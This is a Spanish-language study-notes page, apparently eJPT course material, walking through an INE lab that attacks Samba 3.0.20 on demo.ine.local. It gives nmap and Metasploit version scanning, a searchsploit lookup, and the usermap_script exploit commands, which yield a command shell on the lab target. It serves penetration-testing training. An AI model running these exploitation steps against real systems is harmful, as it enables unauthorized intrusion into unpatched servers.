> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/explotacion/linux/targeting-samba.md).

# Targeting Samba

## &#x20;🧪Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/V1SqYobXBFq0DPCUp5Bn" alt=""><figcaption></figcaption></figure>

**Paso 2:** Verifique si la máquina de destino es accesible:

**Dominio:**

```
ping -c 4 demo.ine.local
```

<figure><img src="/files/T40brsrvTktnocjRov82" alt=""><figcaption></figcaption></figure>

El objetivo es alcanzable.

**Paso 3:** Escaneo de puertos con Nmap.

En este laboratorio, nos centraremos en el puerto SMB que ejecuta Samba. Como resultado, podemos limitar nuestro escaneo de Nmap al puerto 445.

**Dominio:**

```
nmap -sV -p 445 demo.ine.local
```

Como se muestra en la siguiente captura de pantalla, el escaneo de Nmap revela que **Samba smbd** se está ejecutando en el puerto 445.

<figure><img src="/files/2KCQtdOpfaqcvcbSBHFE" alt=""><figcaption></figcaption></figure>

El escaneo de nmap no revela la versión exacta de Samba que se ejecuta en el objetivo, por lo que necesitaremos usar un módulo Metasploit para identificar esta información.

Necesitaremos iniciar la consola de Metasploit Framework (msfconsole) para poder utilizar este módulo, esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
msfconsole
```

Ahora podemos cargar el módulo ejecutando el siguiente comando:

**Dominio:**

```
use auxiliary/scanner/smb/smb_version
```

Después de cargar el módulo, necesitaremos configurar las opciones del módulo, más específicamente, necesitaremos establecer el objetivo.

**Dominio:**

```
set RHOSTS demo.ine.local
```

Ahora podemos ejecutar el módulo ejecutando el siguiente comando:

**Dominio:**

```
run
```

<figure><img src="/files/8XV738hoMO00Zfnx8B5Y" alt=""><figcaption></figcaption></figure>

Como se muestra en la captura de pantalla anterior, el módulo identifica la versión de Samba como **samba 3.0.20** .

**Paso 4:** Búsqueda de exploits con Searchsploit.

Ahora que hemos identificado la versión específica de Samba que se ejecuta en el objetivo, podemos usar una herramienta como Searchsploit para encontrar exploits que afecten a esta versión. Esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
searchsploit samba 3.0.20
```

Como se muestra en la siguiente captura de pantalla, Searchsploit revela algunos exploits, uno de los cuales es un módulo de exploit de Metasploit que se puede utilizar para explotar la versión de Samba que se ejecuta en el sistema de destino.

<figure><img src="/files/4yQiYlDOcvHRm9HjBLau" alt=""><figcaption></figcaption></figure>

**Paso 5:** Ejecutemos este módulo de explotación:

**Comandos:**

```
use exploit/multi/samba/usermap_script
set RHOSTS demo.ine.local
exploit
```

<figure><img src="/files/l7d7Uw9CKxvtCXPSsdVs" alt=""><figcaption></figcaption></figure>

Como se muestra en la captura de pantalla anterior, el módulo de explotación se ejecuta correctamente y nos proporciona un shell de comando.

## Conclusión

En este laboratorio, exploramos el proceso de explotación de una versión vulnerable de Samba que se ejecuta en un objetivo Linux.
